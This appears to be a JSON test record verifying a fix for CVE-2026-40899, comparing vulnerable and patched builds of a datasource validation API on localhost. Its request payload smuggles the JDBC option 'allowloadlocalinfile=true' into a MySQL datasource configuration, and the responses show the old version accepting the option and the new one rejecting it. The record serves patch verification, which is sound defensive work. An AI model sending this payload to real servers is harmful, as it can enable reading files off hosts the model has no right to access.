{
  "cve": "CVE-2026-40899",
  "vulnerable_version": "v2.10.20",
  "fixed_version": "v2.10.21",
  "test_method": "docker_desktop_mode_http_api",
  "endpoints": {
    "vulnerable": "http://127.0.0.1:18100/de2api/datasource/validate",
    "fixed": "http://127.0.0.1:18101/de2api/datasource/validate"
  },
  "request_payload": {
    "type": "mysql",
    "name": "evil-ds",
    "nodeType": "datasource",
    "action": "validate",
    "configuration_base64_decoded": {
      "type": "mysql",
      "host": "127.0.0.1",
      "port": 3306,
      "dataBase": "test",
      "extraParams": "allowloadlocalinfile=true",
      "illegalParameters": []
    }
  },
  "responses": {
    "vulnerable": {"code":40001,"msg":"DEException(code=40001, msg=Communications link failure\n\nThe last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.)","data":null},
    "fixed": {"code":40001,"msg":"DEException(code=40001, msg=Illegal parameter: allowloadlocalinfile)","data":null}
  },
  "evidence": {
    "vulnerable_bypass_indicator": "Communications link failure",
    "fixed_block_indicator": "Illegal parameter: allowloadlocalinfile"
  }
}